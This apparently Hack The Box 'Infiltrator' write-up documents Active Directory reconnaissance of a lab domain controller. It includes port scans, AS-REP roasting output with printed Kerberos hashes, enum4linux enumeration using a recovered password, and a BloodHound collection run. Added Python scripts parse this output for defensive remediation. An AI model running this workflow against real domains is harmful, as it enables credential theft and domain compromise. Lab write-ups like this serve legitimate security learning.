The difficulty fully deserves its INSANE rating. About 90% of this writeup is reproduction of others' work, and I still haven't fully figured out the final PE part; if I get the chance later I'll fill it in and summarize the overall approach.
I'm learning this with no domain-penetration background at all, so some of my understanding may be off. Please do point out mistakes so I can fix them!!!
Information gathering
```
start infoscan
10.10.11.31:80 open
10.10.11.31:88 open
10.10.11.31:445 open
10.10.11.31:139 open
10.10.11.31:135 open
[*] alive ports len is: 5
start vulscan
[*] WebTitle http://10.10.11.31        code:200 len:31235  title:Infiltrator.htb
[*] NetInfo
[*]10.10.11.31
   [->]dc01
   [->]10.10.11.31
```
```
nmap -sSVC infiltrator.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-05 15:14 CST
Nmap scan report for infiltrator.htb (10.10.11.31)
Host is up (0.073s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Infiltrator.htb
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-05 07:04:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
|_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR
| Not valid before: 2024-08-04T18:48:15
|_Not valid after:  2099-07-17T18:48:15
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time.
| ssl-cert: Subject: commonName=dc01.infiltrator.htb
| Not valid before: 2024-07-30T13:20:17
|_Not valid after:  2025-01-29T13:20:17
| rdp-ntlm-info: 
|   Target_Name: INFILTRATOR
|   NetBIOS_Domain_Name: INFILTRATOR
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: infiltrator.htb
|   DNS_Computer_Name: dc01.infiltrator.htb
|   DNS_Tree_Name: infiltrator.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2024-09-05T07:04:55+00:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```
```
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.12.0', 'GetNPUsers.py')
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User D.Anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User O.Martinez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User K.Turner@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User A.Walker@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User M.Harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$L.Clark@infiltrator.htb@INFILTRATOR.HTB:d2b6127bdd253a8a6ea3a0bb86a3c816$4e7096e0a6ba8409033c25edbee6187609209b76a6c7beef2f398abaca8c66f74cb0cf05523b3f2cd97e9e01774ddde4d2aeb62289f7ca692f5c69000b872ee270056573b8dfb37508c8821243f5043d5139770dfbb276276078f55fc8412f70103cf0877aa5df36da60ce44d09c1ea5b6b898f14cc1bac2952061616359b02d02209730df4f6a995e75c7e17955983c13d53989855cffe18a641007c6378e622c8bdb6c1b5f6b597a2af6726aa14f631fdd79d8bf70fc989c09ad9b6ccdbc4baf6313414a863661a5546cb3c0308044aca3b2426d8af6f0b9ffbd2b875c372339755eb5086ff54ca56870e7ce0533587317
[-] User E.Rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User d.anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User o.martinez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.turner@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a.walker@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:29a707b0d8f8b993355bcfa7a6b9bf70$b229a3fd6ff41bc50682fed30a35e19bc4b7a013c3398873cbe184fb5b6f155a1a9fb725ae126572532fbde8486aaa9a9063fd3589441f5406037c4cd20ac94e9cb094dfdc9cd45b770f39272408b10d2cae3eb8d70cc1b47f612d0537805b4b4d48504cd5eab872059ebcf33cd5d7bcd94bc3bdb614de1b9cab4a6842fc974b74c4c997913d4764f8e1cbb11211d5d6f9d3a1d8fbf317e0979d44ea756974aa09fcbbc925b0926d0194c99c948f418ff65538cdfef8f7ea1d884849b1f4a280fbb9fdf2e35d3e9343b15f675e7ebc6f849e73c0e4d5131b10023d63b247cac1ba0ebff9065737f49ba1b6598fe818c4f15b
[-] User e.rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
```
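The `$krb5asrep$` lines in the output above are the part that matters from a defensive standpoint: each one means the KDC issued an AS-REP for an account that has `DONT_REQUIRE_PREAUTH` set, and with etype 23 (RC4) that reply can be attacked offline. The Python parser below is an added example, not part of the original writeup or of impacket; it turns GetNPUsers-style output into a remediation list. The sample output embedded in it is constructed, and the hash material is a made-up placeholder rather than a real AS-REP.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of GetNPUsers.py-style output (abridged). The hash
# material is a placeholder, not a real AS-REP.
SAMPLE_OUTPUT = """\
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User d.anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:00112233445566778899aabbccddeeff$0123456789abcdef0123456789abcdef0123456789abcdef
[-] User e.rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
"""

# impacket's hashcat-style format: $krb5asrep$<etype>$<principal>:<16-byte checksum>$<edata2>
HASH_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<principal>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)
NOPREAUTH_RE = re.compile(
    r"^\[-\] User (?P<user>\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set$"
)
UNKNOWN_RE = re.compile(r"KDC_ERR_C_PRINCIPAL_UNKNOWN")


@dataclass
class AsrepReport:
    roastable: dict = field(default_factory=dict)      # user -> parsed hash details
    preauth_required: list = field(default_factory=list)
    unknown_principals: int = 0                        # names the KDC does not know


def parse_asrep_hash(line):
    """Split one $krb5asrep$ line into its fields; None if it is not one."""
    m = HASH_RE.match(line)
    if not m:
        return None
    principal = m.group("principal")
    # impacket writes "<clientName>@<domain>". When the wordlist already held
    # user@domain, clientName itself contains an '@', so the realm is whatever
    # follows the LAST '@' and the bare username precedes the first one.
    client, _, realm = principal.rpartition("@")
    user = client.split("@")[0]
    return {
        "user": user,
        "realm": realm,
        "etype": int(m.group("etype")),
        "checksum": m.group("checksum"),
        "edata_len": len(m.group("edata")) // 2,       # bytes of encrypted data
    }


def parse_getnpusers(text):
    """Classify every line of GetNPUsers output into an AsrepReport."""
    rep = AsrepReport()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if UNKNOWN_RE.search(line):
            rep.unknown_principals += 1
            continue
        m = NOPREAUTH_RE.match(line)
        if m:
            rep.preauth_required.append(m.group("user"))
            continue
        h = parse_asrep_hash(line)
        if h:
            rep.roastable[h["user"].lower()] = h
    return rep


def remediation_lines(rep):
    """One actionable line per account the KDC answered without pre-auth."""
    out = []
    for user, h in sorted(rep.roastable.items()):
        weak = " (etype 23 = RC4, offline-crackable)" if h["etype"] == 23 else ""
        out.append(f"{user}@{h['realm']}: clear DONT_REQUIRE_PREAUTH{weak}")
    return out


if __name__ == "__main__":
    report = parse_getnpusers(SAMPLE_OUTPUT)
    print(f"unknown principals: {report.unknown_principals}")
    print(f"pre-auth enforced : {len(report.preauth_required)}")
    for line in remediation_lines(report):
        print("FIX:", line)
```

Feeding it the real output from above would flag only `l.clark`; everyone else either enforces pre-authentication or is not a principal the KDC knows, which is why the tool printed `KDC_ERR_C_PRINCIPAL_UNKNOWN` for those wordlist entries.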
```
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep  5 16:20:57 2024

 =========================================( Target Information )=========================================

Target ........... 10.10.11.31
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... 'WAT?watismypass!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ============================( Enumerating Workgroup/Domain on 10.10.11.31 )============================

[E] Can't find workgroup/domain

 ====================================( Session Check on 10.10.11.31 )====================================

[E] Server doesn't allow session using username '', password 'WAT?watismypass!'.  Aborting remainder of tests.

┌──(root㉿kali)-[/home/…/桌面/weapon/windows/AD]
└─# enum4linux -U -p 'WAT?watismypass!' infiltrator.htb
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep  5 16:21:58 2024

 =========================================( Target Information )=========================================

Target ........... infiltrator.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... 'WAT?watismypass!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==========================( Enumerating Workgroup/Domain on infiltrator.htb )==========================

[E] Can't find workgroup/domain

 ==================================( Session Check on infiltrator.htb )==================================

[E] Server doesn't allow session using username '', password 'WAT?watismypass!'.  Aborting remainder of tests.

┌──(root㉿kali)-[/home/…/桌面/weapon/windows/AD]
└─# enum4linux -a -u /home/kali/桌面/weapon/Infiltrator/email.txt -p 'WAT?watismypass!' infiltrator.htb
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep  5 16:26:39 2024

 =========================================( Target Information )=========================================

Target ........... infiltrator.htb
RID Range ........ 500-550,1000-1050
Username ......... '/home/kali/桌面/weapon/Infiltrator/email.txt'
Password ......... 'WAT?watismypass!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==========================( Enumerating Workgroup/Domain on infiltrator.htb )==========================

[E] Can't find workgroup/domain

 ==============================( Nbtstat Information for infiltrator.htb )==============================

Looking up status of 10.10.11.31
No reply from 10.10.11.31

 ==================================( Session Check on infiltrator.htb )==================================

[E] Server doesn't allow session using username '/home/kali/桌面/weapon/Infiltrator/email.txt', password 'WAT?watismypass!'.  Aborting remainder of tests.

┌──(root㉿kali)-[/home/…/桌面/weapon/windows/AD]
└─# enum4linux -a -u 'l.clark' -p 'WAT?watismypass!' infiltrator.htb
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep  5 16:30:09 2024

 =========================================( Target Information )=========================================

Target ........... infiltrator.htb
RID Range ........ 500-550,1000-1050
Username ......... 'l.clark'
Password ......... 'WAT?watismypass!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==========================( Enumerating Workgroup/Domain on infiltrator.htb )==========================

[E] Can't find workgroup/domain

 ==============================( Nbtstat Information for infiltrator.htb )==============================

Looking up status of 10.10.11.31
No reply from 10.10.11.31

 ==================================( Session Check on infiltrator.htb )==================================

[+] Server infiltrator.htb allows sessions using username 'l.clark', password 'WAT?watismypass!'

 ===============================( Getting domain SID for infiltrator.htb )===============================

Domain Name: INFILTRATOR
Domain Sid: S-1-5-21-2606098828-3734741516-3625406802

[+] Host is part of a domain (not a workgroup)

 =================================( OS information on infiltrator.htb )=================================

[E] Can't get OS info with smbclient

[+] Got OS info for infiltrator.htb from srvinfo:
	INFILTRATOR.HTBWk Sv PDC Tim NT
	platform_id     :	500
	os version      :	10.0
	server type     :	0x80102b

 ================================( Share Enumeration on infiltrator.htb )================================

do_connect: Connection to infiltrator.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Getting domain group memberships:
Group: 'Domain Admins' (RID: 512) has member: INFILTRATOR\Administrator
Group: 'Schema Admins' (RID: 518) has member: INFILTRATOR\Administrator
Group: 'Infiltrator_QA' (RID: 1114) has member: INFILTRATOR\K.turner
Group: 'Developers' (RID: 1112) has member: INFILTRATOR\M.harris
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\Administrator
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\krbtgt
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\D.anderson
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\L.clark
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\M.harris
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\O.martinez
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\A.walker
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\K.turner
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\E.rodriguez
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\winrm_svc
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\lan_managment
Group: 'Marketing_Team' (RID: 1115) has member: INFILTRATOR\D.anderson
Group: 'Marketing_Team' (RID: 1115) has member: INFILTRATOR\L.clark
Group: 'Domain Computers' (RID: 515) has member: INFILTRATOR\infiltrator_svc$
Group: 'Protected Users' (RID: 525) has member: INFILTRATOR\D.anderson
Group: 'Protected Users' (RID: 525) has member: INFILTRATOR\M.harris
Group: 'Enterprise Admins' (RID: 519) has member: INFILTRATOR\Administrator
Group: 'Chiefs Marketing' (RID: 1111) has member: INFILTRATOR\O.martinez
Group: 'Chiefs Marketing' (RID: 1111) has member: INFILTRATOR\A.walker
Group: 'Domain Guests' (RID: 514) has member: INFILTRATOR\Guest
Group: 'Group Policy Creator Owners' (RID: 520) has member: INFILTRATOR\Administrator
Group: 'Domain Controllers' (RID: 516) has member: INFILTRATOR\DC01$
Group: 'Service_Management' (RID: 1116) has member: INFILTRATOR\winrm_svc
Group: 'Digital_Influencers' (RID: 1113) has member: INFILTRATOR\E.rodriguez

 =================( Users on infiltrator.htb via RID cycling (RIDS: 500-550,1000-1050) )=================

[I] Found new SID: S-1-5-21-2606098828-3734741516-3625406802
[I] Found new SID: S-1-5-21-2606098828-3734741516-3625406802
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-21-2606098828-3734741516-3625406802
[I] Found new SID: S-1-5-21-2606098828-3734741516-3625406802

 ==============================( Getting printer info for infiltrator.htb )==============================

do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND
```
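The group-membership dump above is dense, and the interesting facts (who holds domain-wide privilege, who is shielded by Protected Users) are easy to miss when reading it by hand. As an added example, not part of the original post or of enum4linux, the Python script below parses lines in that exact `Group: '...' (RID: n) has member: DOMAIN\user` format into a per-user view, identifies privileged groups by their well-known RIDs rather than by name, and reports which privileged accounts are not covered by Protected Users hardening. The sample lines are constructed from the format above and the membership is illustrative.

```python
import re
from collections import defaultdict

# Constructed sample in enum4linux's "Getting domain group memberships" format.
SAMPLE_GROUPS = """\
Group: 'Domain Admins' (RID: 512) has member: INFILTRATOR\\Administrator
Group: 'Schema Admins' (RID: 518) has member: INFILTRATOR\\Administrator
Group: 'Developers' (RID: 1112) has member: INFILTRATOR\\M.harris
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\\L.clark
Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\\winrm_svc
Group: 'Protected Users' (RID: 525) has member: INFILTRATOR\\D.anderson
Group: 'Protected Users' (RID: 525) has member: INFILTRATOR\\M.harris
Group: 'Enterprise Admins' (RID: 519) has member: INFILTRATOR\\Administrator
Group: 'Service_Management' (RID: 1116) has member: INFILTRATOR\\winrm_svc
"""

LINE_RE = re.compile(
    r"^Group: '(?P<group>[^']+)' \(RID: (?P<rid>\d+)\) has member: "
    r"(?P<domain>[^\\]+)\\(?P<member>\S+)$"
)

# Well-known RIDs of domain groups whose membership amounts to domain-wide control.
# Matching on the RID, not the display name, survives renamed groups.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
    520: "Group Policy Creator Owners",
}
PROTECTED_USERS_RID = 525


def parse_memberships(text):
    """Return (group -> set of lower-cased members, group -> RID)."""
    members = defaultdict(set)
    rids = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # banner, blank or unrelated output line
        members[m["group"]].add(m["member"].lower())
        rids[m["group"]] = int(m["rid"])
    return members, rids


def audit(text):
    """Per-user view plus the two findings a defender wants first."""
    members, rids = parse_memberships(text)
    groups_of = defaultdict(set)
    for group, users in members.items():
        for user in users:
            groups_of[user].add(group)

    privileged = {u for u, gs in groups_of.items()
                  if any(rids[g] in PRIVILEGED_RIDS for g in gs)}
    protected = {u for u, gs in groups_of.items()
                 if any(rids[g] == PROTECTED_USERS_RID for g in gs)}
    return {
        "privileged": sorted(privileged),
        "protected": sorted(protected),
        # Privileged accounts outside Protected Users keep NTLM, RC4 keys and
        # delegation enabled, so they are the first hardening candidates.
        "privileged_not_protected": sorted(privileged - protected),
        "groups_of": {u: sorted(gs) for u, gs in groups_of.items()},
    }


if __name__ == "__main__":
    result = audit(SAMPLE_GROUPS)
    for key in ("privileged", "protected", "privileged_not_protected"):
        print(f"{key:26}: {', '.join(result[key]) or '-'}")
```

Run against the real dump above, the script reports `administrator` as privileged but not in Protected Users, while `d.anderson` and `m.harris` are protected without holding any privileged group; that mismatch is the kind of thing to raise with whoever owns the domain.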
```
bloodhound-python -c ALL -u l.clark -p 'WAT?watismypass!' -d infiltrator.htb -ns 10.10.11.31
INFO: Found AD domain: infiltrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.infiltrator.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 14 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.infiltrator.htb
WARNING: Failed to get service ticket for dc01.infiltrator.htb, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 27S
```